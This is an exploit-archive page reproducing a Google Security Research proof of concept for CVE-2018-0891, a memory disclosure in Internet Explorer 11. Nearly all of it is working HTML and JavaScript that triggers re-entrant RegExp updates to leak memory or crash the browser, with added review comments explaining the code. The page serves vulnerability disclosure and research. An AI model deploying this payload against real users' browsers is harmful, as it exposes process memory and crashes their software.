Internet Explorer - 'RegExp.lastMatch' Memory Disclosure



EKU-ID: 7454 CVE: 2018-0891 OSVDB-ID:
Author: Google Security Research Published: 2018-03-21 Verified: Verified


/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
 
This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.
 
PoC:
 
=========================================
*/
 
<!-- saved from url=(0014)about:internet -->
<script>
 
/**
 * Entry point of the PoC: assigns an object whose toString is the
 * script-defined function f to RegExp.input, then reads RegExp.lastMatch
 * and displays the result in an alert box.
 */
function main() {
  // Any string conversion of this object runs f().
  // NOTE(review): presumably IE performs that conversion while servicing the
  // lastMatch read below, letting script run mid-operation; the page does not
  // state the root cause, so confirm against the vendor advisory for the CVE.
  RegExp.input = {toString: f};
  // Per the author's note on this page, the value shown here is sometimes
  // pieces of memory, and sometimes the process crashes instead.
  alert(RegExp.lastMatch);
}
 
// Subject string for the match in f(). Array(n).join(c) yields n-1 copies of
// c, so this is 9,999,999 "a" characters, then 10 "b" characters, then 99 "a"
// characters. The 10-"b" run is exactly what the pattern in f() matches.
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 
/**
 * Installed by main() as the toString of the object stored in RegExp.input.
 * Runs a match of "bbbbbbbbbb" against the large global `input` string and
 * returns nothing (undefined); it is called only for its side effect.
 */
function f() {
  // A string argument to match() is turned into a regular expression, and a
  // successful match updates the RegExp static properties.
  // NOTE(review): presumably this re-entrant update is what leaves
  // RegExp.lastMatch referring to stale or mismatched data; not stated on the
  // page, so treat as an assumption.
  String.prototype.match.call(input, "bbbbbbbbbb");
}
 
// Run the PoC immediately when the script block executes (no user interaction).
main();
 
</script>
 
/*
=========================================
 
Note that the PoC sometimes results in a crash (I made no attempt to make it reliable), while at other times it results in pieces of memory being displayed.
*/